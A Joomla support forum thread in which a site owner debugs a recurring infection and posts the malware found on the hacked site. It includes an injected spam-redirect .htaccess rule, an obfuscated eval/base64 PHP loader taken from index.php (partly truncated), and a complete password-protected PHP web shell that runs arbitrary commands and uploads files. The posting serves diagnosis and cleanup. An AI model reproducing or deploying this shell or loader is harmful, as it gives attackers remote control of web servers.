Site keeps getting infected even with SecurityCheck Pro
- shibumi
-
Topic Author
- Offline
- Premium Member
-
Less
More
5 years 3 months ago - 5 years 3 months ago #4509
by shibumi
Replied by shibumi on topic Site keeps getting infected even with SecurityCheck Pro
If I delete the SecurityCheck Pro generated .htaccess file I can get back into the front end... as soon as I generate a new .htaccess file with SecurityCheck Pro, I can no longer access the site's front end... delete the .htaccess file and I am able to access the front end again...
Back end access still accessible in both situations.
Don't know if this matters or not, but I upgraded my server to EasyApache4 with all sites now running PHP 7
Back end access still accessible in both situations.
Don't know if this matters or not, but I upgraded my server to EasyApache4 with all sites now running PHP 7
Last edit: 5 years 3 months ago by shibumi.
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Administrator
-
Less
More
- Thank you received: 335
5 years 3 months ago #4510
by Jose
Replied by Jose on topic Site keeps getting infected even with SecurityCheck Pro
Try setting the first dropdowns to No (don't forget save the changes); sometimes cause issues on some servers.
Regards,
Jose
Regards,
Jose
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Premium Member
-
5 years 3 months ago - 5 years 3 months ago #4511
by shibumi
Replied by shibumi on topic Site keeps getting infected even with SecurityCheck Pro
No change... I use the same settings for all of my sites, and this is the only one giving me problems. The only way I can access the site is deleting the .htaccess file completely - if I revert back to the original Joomla .htaccess file, it works fine...
* after using the default Joomla 3.7.0 .htaccess file, then using SecurityCheck Pro to generate a new one, not getting 403 Forbidden message anymore... so strange
* after using the default Joomla 3.7.0 .htaccess file, then using SecurityCheck Pro to generate a new one, not getting 403 Forbidden message anymore... so strange
Last edit: 5 years 3 months ago by shibumi. Reason: new information
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Administrator
-
Less
More
- Thank you received: 335
5 years 3 months ago #4512
by Jose
Replied by Jose on topic Site keeps getting infected even with SecurityCheck Pro
Then this is a permissions issue; check if the user that runs Joomla has permissions to access the .htacess file generated. Maybe the update you did is causing the issue.
Regards,
Jose
Regards,
Jose
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Premium Member
-
5 years 3 months ago #4536
by shibumi
Replied by shibumi on topic Site keeps getting infected even with SecurityCheck Pro
Okay, so I turned off my AutoSSL feature for this domain on my WHM, and something is still wiping my .htaccess file that is generated with SecurityCheck Pro, and this morning it was overwritten with this content:
instead of the usual:
and, instead of the normal AutoSSL modified timestamp of today's date at 5:23am, it has a timestamp of December 11, 2009 8:01pm
At first I thought it was the AutoSSL feature that was wiping my .htaccess file to put it's code in, but after turning off that feature, and seeing that the .htaccess file was still getting wiped, and different code inserted, leads me to believe there is something else I'm missing.
File integrity check only shows 4 files modified:
both .htaccess and index.php files were modified sometime between 10:00pm EDT last night and 1:00pm EDT today...
Malware scan shows 6 High alert files, and 58 medium alert files. Upon further inspection - I installed ZOO on a local copy of Joomla 3.7.0 and it doesn't even have a /media/zoo/applications/documentation folder - the only folder under applications is blog and page, nothing else. I'm not familiar with ZOO extensions, but again, I didn't build this site, and I don't have access to their "paid" extensions to confirm original code. I have attached the malware scan results from today's scan.
My root index.php file is once again injected with the same code after the opening <?php :
Code:
RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
instead of the usual:
Code:
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
and, instead of the normal AutoSSL modified timestamp of today's date at 5:23am, it has a timestamp of December 11, 2009 8:01pm
At first I thought it was the AutoSSL feature that was wiping my .htaccess file to put it's code in, but after turning off that feature, and seeing that the .htaccess file was still getting wiped, and different code inserted, leads me to believe there is something else I'm missing.
File integrity check only shows 4 files modified:
Code:
.htaccess /public_html/.htaccess 267 2009-12-11 18:01:59 Hash value has changed
error_log /public_html/administrator/error_log 6523153 2017-05-07 08:24:50 Hash value has changed
configuration.php /public_html/configuration.php 3129 2017-05-07 13:23:20 Hash value has changed
index.php /public_html/index.php 18083 2010-03-26 13:56:58 Hash value has changed
both .htaccess and index.php files were modified sometime between 10:00pm EDT last night and 1:00pm EDT today...
Malware scan shows 6 High alert files, and 58 medium alert files. Upon further inspection - I installed ZOO on a local copy of Joomla 3.7.0 and it doesn't even have a /media/zoo/applications/documentation folder - the only folder under applications is blog and page, nothing else. I'm not familiar with ZOO extensions, but again, I didn't build this site, and I don't have access to their "paid" extensions to confirm original code. I have attached the malware scan results from today's scan.
My root index.php file is once again injected with the same code after the opening <?php :
Code:
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZGtmck9jeHdXakJiWk
... more code here ...
Cc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Premium Member
-
5 years 3 months ago #4537
by shibumi
Replied by shibumi on topic Site keeps getting infected even with SecurityCheck Pro
So, I started uninstalling some extensions, namely ZOO and DJImageSlider, and ran malware scans after each removal. Now getting only 20 suspicious files, and found this file: /libraries/joomla/model/class.php - not part of the Joomla core files, so I looked at the code:
Delete file, fix .htaccess file, remove code from index.php, and wait to see what happens tomorrow...
Code:
<?php
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "51c78cfb5147c2cfc";
$part = "12eb7b37ab656fe";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>
<form action="'.$_SERVER['PHP_SELF'].'" name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input">
<input type="hidden" name="multipart" size="30" class="pp" value="'.$_POST['multipart'].'">
<br>
<pre>';
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
echo "<p>".@getcwd()."</p>";
}
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "<p>$dez</p>";
}
echo '<form action="'.$_SERVER['PHP_SELF'].'" name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="'.passthru("pwd").'">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
<input type="hidden" name="multipart" size="30" class="pp" value="'.$_POST['multipart'].'">
</td>
</tr>
</table>';
}
else
{
echo '<head><form name="multipart" method="POST" enctype="multipart/form-data">
<input type="text" name="multipart" size="30" class="input">';
}
echo '</body>
</html>';
?>
Please Log in or Create an account to join the conversation.
Time to create page: 0.175 seconds
In order to provide you with the best online experience this website uses cookies. Delete cookies
In order to provide you with the best online experience this website uses cookies.
By using our website, you agree to our use of cookies.
I agree
Copyright © 2022 Securitycheck Extensions. All Rights Reserved.
This site is not affiliated with or endorsed by the Joomla! Project. It is not supported or warranted by the Joomla! Project or Open Source Matters. The Joomla! logo is used under a limited license granted by Open Source Matters, the trademark holder in the United States and other countries.
We may collect your IP address and your browser's User Agent string while using our site for security reasons. This information is retained only until we check you're not trying to hack our website.